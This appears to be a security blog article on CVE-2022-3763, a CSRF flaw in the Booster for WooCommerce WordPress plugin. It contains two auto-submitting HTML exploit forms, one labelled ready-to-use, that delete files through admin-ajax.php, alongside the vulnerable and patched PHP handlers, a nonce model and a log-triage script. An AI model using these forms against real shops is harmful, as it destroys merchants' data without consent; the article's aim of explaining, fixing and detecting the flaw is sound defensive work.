CVE-2022-3763 - Unveiling a CSRF Flaw in Booster for WooCommerce – Exploit Details, Impact & Fixes
The Booster for WooCommerce is a popular WordPress plugin suite used by thousands of eCommerce businesses worldwide to enhance their WooCommerce shops with flexible features. However, in September 2022, a significant security vulnerability came to light: CVE-2022-3763. This CSRF (Cross-Site Request Forgery) vulnerability allowed malicious attackers to trick logged-in shop managers or administrators into deleting files uploaded at checkout—potentially harming business operations and damaging trust.
In this long-read, we’ll break down how the flaw works, review a simple exploit scenario, analyze the plugin’s code, and discuss what you can do to stay safe. We'll keep the language simple while diving deep into the technicals.
Booster Elite for WooCommerce (before 1.1.7)
Problem:
When users upload files at the checkout (for things like custom order requests or documentation), the backend has a feature allowing shop managers/admins to delete those files. But—there was no CSRF check when making a deletion request. That means a malicious website could craft a special link or form that, if visited by a logged-in administrative user, would call this deletion endpoint and remove files—without permission.
Exploit Scenario: How an Attacker Can Delete Your Shop Files
Imagine you’re a shop manager, and while logged into your WooCommerce WordPress dashboard, you happen to visit a malicious website or click a link in a phishing email.
That website might silently submit the following HTML form in the background:

```html
<form action="https://yourshop.com/wp-admin/admin-ajax.php" method="POST">
  <input type="hidden" name="action" value="wcj_order_delete_upload_file">
  <input type="hidden" name="wcj_delete_upload_file" value="path_to_the_target_file">
  <input type="submit">
</form>
<script>
  document.forms[0].submit();
</script>
```
If you’re logged in and allowed to delete files (as manager or admin), the browser automatically includes your session cookie and security credentials—but because there’s no CSRF check (like a WordPress nonce), the plugin treats this POST request as legitimate. The specified file is deleted, and you—the victim—never even notice.
Looking at the Vulnerable Code
Below is a simplified PHP snippet (representing what happens inside the affected plugin) that shows where the CSRF check was missed:

```php
// A simplified version of the file deletion handler in Booster for WooCommerce
add_action( 'wp_ajax_wcj_order_delete_upload_file', 'wcj_order_delete_upload_file_callback' );

function wcj_order_delete_upload_file_callback() {
    // No nonce/CSRF check is done here: any request that arrives with the
    // victim's session cookie goes straight to the capability check.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Not allowed' );
    }
    // The path to delete is taken directly from the POST body.
    $file_path = isset( $_POST['wcj_delete_upload_file'] ) ? $_POST['wcj_delete_upload_file'] : '';
    if ( $file_path && file_exists( $file_path ) ) {
        unlink( $file_path );
    }
    // Redirect or print status
    exit;
}
```
What’s missing?
No verification of a WordPress nonce, which is the standard way to defend against CSRF.
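To make the missing check concrete, here is an added Python model of how a WordPress-style nonce ties a request to a user, an action and a time window. It is not code from the article or from the plugin: it follows the shape of wp_create_nonce()/wp_verify_nonce() (tick|action|user|session-token hashed with a server secret, 10 hex characters kept, valid for the current and previous half-lifetime tick) but uses HMAC-SHA256 with a constructed secret in place of WordPress's salted wp_hash(). The user id, session token and file path are constructed values, and the "handler" only reports the decision it would make instead of unlinking anything.

```python
import hashlib
import hmac
import math

# Constructed stand-in for the server-side NONCE_KEY/NONCE_SALT (assumption, not a real key).
NONCE_SECRET = b"constructed-demo-secret-not-for-real-use"
NONCE_LIFE = 86400  # WordPress default nonce lifetime: 24 hours
ACTION = "wcj_order_delete_upload_file"


def nonce_tick(now: int) -> int:
    """Time is split into half-lifetime ticks; a nonce stays valid for the current and previous tick."""
    return math.ceil(now / (NONCE_LIFE / 2))


def make_nonce(tick: int, action: str, user_id: int, session_token: str) -> str:
    """Keyed hash over tick|action|user|session, trimmed to 10 hex chars as WordPress does."""
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    digest = hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()
    return digest[-12:-2]


def create_nonce(action: str, user_id: int, session_token: str, now: int) -> str:
    """What the shop's own admin page embeds in its form (wp_create_nonce equivalent)."""
    return make_nonce(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce: str, action: str, user_id: int, session_token: str, now: int):
    """Return 1 (current tick), 2 (previous tick) or False, mirroring wp_verify_nonce()."""
    if not nonce:
        return False
    tick = nonce_tick(now)
    if hmac.compare_digest(nonce, make_nonce(tick, action, user_id, session_token)):
        return 1
    if hmac.compare_digest(nonce, make_nonce(tick - 1, action, user_id, session_token)):
        return 2
    return False


def handle_delete_request(post: dict, user_id: int, session_token: str, now: int) -> str:
    """Model of the patched handler: the nonce is checked before the file path is even read."""
    if not verify_nonce(post.get("_wpnonce", ""), ACTION, user_id, session_token, now):
        return "Security check failed"
    # The real plugin would unlink the file here; the model just reports the decision.
    return "would delete " + post.get("wcj_delete_upload_file", "")


def demo(now: int = 1_700_000_000) -> dict:
    """Contrast the shop's own admin form with the cross-site form shown in the article."""
    user_id, session_token = 7, "constructed-session-token"  # constructed victim session
    legit_post = {
        "action": ACTION,
        "wcj_delete_upload_file": "order123/userdoc.pdf",
        "_wpnonce": create_nonce(ACTION, user_id, session_token, now),
    }
    # The attacker's page has neither the server secret nor the victim's session token,
    # so the cross-site form can only omit the nonce or guess one.
    csrf_post = {"action": ACTION, "wcj_delete_upload_file": "order123/userdoc.pdf"}
    guessed_post = dict(csrf_post, _wpnonce="0123456789")
    return {
        "legit": handle_delete_request(legit_post, user_id, session_token, now),
        "csrf_no_nonce": handle_delete_request(csrf_post, user_id, session_token, now),
        "csrf_guessed": handle_delete_request(guessed_post, user_id, session_token, now),
        # A nonce minted for another action does not unlock this one.
        "wrong_action": verify_nonce(create_nonce("wcj_other_action", user_id, session_token, now),
                                     ACTION, user_id, session_token, now),
        # Half a lifetime later the nonce is still accepted (as 2); a full lifetime later it is not.
        "half_life_later": verify_nonce(legit_post["_wpnonce"], ACTION, user_id, session_token,
                                        now + NONCE_LIFE // 2),
        "full_life_later": verify_nonce(legit_post["_wpnonce"], ACTION, user_id, session_token,
                                        now + NONCE_LIFE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>16}: {result}")
```

The point the model makes is that the cookie alone proves nothing about where the request originated, while the nonce is bound to the user's session and the specific action, so the attacker's page cannot produce one. The 1/2 return values matter when you port this thinking to PHP: wp_verify_nonce() returns 2 for a nonce from the previous tick, which is still truthy, so checking `! wp_verify_nonce(...)` as the patched handler does is the correct test.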
References
- Original Plugin Vulnerability Report (WPScan)
- Patch Release Notes (Booster for WooCommerce)
- Common WordPress Nonce Protection Doc
Here’s a ready-to-use CSRF exploit (for demonstration/testing on your own site only!):

```html
<!-- Save this as csrf-delete.html and change the URLs/paths accordingly -->
<form action="https://vulnerable-shop.com/wp-admin/admin-ajax.php" method="POST">
  <input type="hidden" name="action" value="wcj_order_delete_upload_file">
  <input type="hidden" name="wcj_delete_upload_file" value="/var/www/wp-content/uploads/woo_uploads/order123/userdoc.pdf">
  <input type="submit">
</form>
<script>
  document.forms[0].submit();
</script>
```
If a logged-in manager/admin visits this page, /var/www/wp-content/uploads/woo_uploads/order123/userdoc.pdf is deleted.
Booster Elite for WooCommerce 1.1.7
How did they fix it?
They added CSRF checks using nonces. Here’s a simplified fixed handler:

```php
function wcj_order_delete_upload_file_callback() {
    // Reject the request before anything else unless it carries a nonce
    // minted for this action by the shop's own admin page.
    if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'wcj_order_delete_upload_file' ) ) {
        wp_die( 'Security check failed' );
    }
    // ...rest of code as before
}
```
- Review logs: Look for unexpected file deletions in your WooCommerce orders.
- Educate staff: Remind staff not to click unknown links or visit unknown sites while logged in as admin.
- Check other plugins: CSRF bugs like this are common—regularly review and update all extensions.
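As an added example for the "review logs" step (not code from the article or the plugin), the following Python script triages a web server access log for the pattern this attack leaves behind: a POST to /wp-admin/admin-ajax.php whose Referer points at a site other than the shop, or that carries no Referer at all. The log lines are constructed in the standard combined format; the hostnames and IP addresses are made up.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: dict, site_host: str):
    """Return a reason string if this POST to admin-ajax.php looks cross-site, else None."""
    if entry["method"] != "POST" or urlsplit(entry["path"]).path != AJAX_ENDPOINT:
        return None
    referer = entry["referer"]
    if referer in ("", "-"):
        # Admin pages on the shop normally send a Referer; its absence is a weak signal only.
        return "no Referer on admin-ajax POST"
    ref_host = urlsplit(referer).hostname or ""
    if ref_host.lower() != site_host.lower():
        return f"Referer host {ref_host!r} is not the shop"
    return None


def find_suspicious_ajax_posts(lines, site_host: str):
    """Collect admin-ajax POSTs whose Referer is missing or belongs to another site."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry, site_host)
        if reason:
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "referer": entry["referer"], "reason": reason})
    return findings


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Nov/2022:11:15:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 27 '
    '"https://yourshop.com/wp-admin/post.php?post=123&action=edit" "Mozilla/5.0"',
    '203.0.113.10 - - [21/Nov/2022:11:16:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 27 '
    '"https://attacker.example/csrf-delete.html" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Nov/2022:11:17:05 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 42 '
    '"https://yourshop.com/wp-admin/" "Mozilla/5.0"',
    '203.0.113.10 - - [21/Nov/2022:11:18:22 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 27 '
    '"-" "Mozilla/5.0"',
    '192.0.2.44 - - [21/Nov/2022:11:19:00 +0000] "POST /checkout/ HTTP/1.1" 302 0 '
    '"https://yourshop.com/cart/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspicious_ajax_posts(SAMPLE_LOG, "yourshop.com"):
        print(finding)
```

Two caveats for anyone running this against real logs: the `action` parameter travels in the POST body, so an access log cannot tell you which AJAX action was invoked, and a Referer can be legitimately absent because of browser privacy settings or a strict Referrer-Policy. Treat hits as leads to correlate with missing checkout uploads and their modification times, not as proof; the nonce check in the patched plugin remains the actual control.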
Key Takeaways
- CVE-2022-3763 is a classic example of the dangers of missing CSRF protection in WordPress AJAX handlers.
- Keeping your plugins up to date is crucial for WooCommerce shop security.
- Use developer tools like WPScan to stay up to date on plugin vulnerabilities.
If you run a WooCommerce store, stay vigilant, keep everything patched, and know that your website’s security is only as strong as its weakest plugin.
*For more in-depth security analysis and updates, follow credible sources like Patchstack Blog, WPScan, and Booster official website.*
Timeline
Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 16:53:00 UTC